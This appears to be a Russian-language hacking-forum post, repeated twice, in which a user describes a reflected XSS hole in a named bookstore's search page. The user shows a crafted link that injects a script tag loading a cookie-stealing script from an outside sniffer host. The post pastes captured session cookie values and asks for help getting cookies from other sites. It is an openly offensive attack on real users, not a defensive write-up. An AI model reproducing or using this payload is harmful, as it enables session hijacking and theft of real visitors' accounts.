virtuoso_
12.08.2012, 01:00
Всем привет у меня проблема с XSS.
В общем нашол уязвимость http://www.kniga.ru/search/?q=">alert('Fucked') и решил воспользоваться снифферам hacker-pro. В итоге вышло вот этот код
Java highlight
http:
//www.kniga.ru/search/?q=">%3CSCRIPT type=text/javascript src=http://httpz.ru/aorthyjyqpgo.js>"
но когда кто нибудь переходит по этой ссылке выдаёт какую то чуш типа
source:
PHPSESSID
=daf50dd919af1d3cb4c6c059f1e1f6af
; _uc=8da8bdfd5980376cddefb157e6ca5a54; BITRIX_SM_SALE_UID=144347652; _ym_visorc=b.
Я что то не так делаю или что? На сколько помню раньше выдавала куки от mail, vk итд.
p.s А если на этом сниффере генерировать поссивный XSS в ссылку то вообще не чего не выдаёт.
В общем нашол уязвимость http://www.kniga.ru/search/?q=">alert('Fucked') и решил воспользоваться снифферам hacker-pro. В итоге вышло вот этот код
Java highlight
http:
//www.kniga.ru/search/?q=">%3CSCRIPT type=text/javascript src=http://httpz.ru/aorthyjyqpgo.js>"
но когда кто нибудь переходит по этой ссылке выдаёт какую то чуш типа
source:
PHPSESSID
=daf50dd919af1d3cb4c6c059f1e1f6af
; _uc=8da8bdfd5980376cddefb157e6ca5a54; BITRIX_SM_SALE_UID=144347652; _ym_visorc=b.
Я что то не так делаю или что? На сколько помню раньше выдавала куки от mail, vk итд.
p.s А если на этом сниффере генерировать поссивный XSS в ссылку то вообще не чего не выдаёт.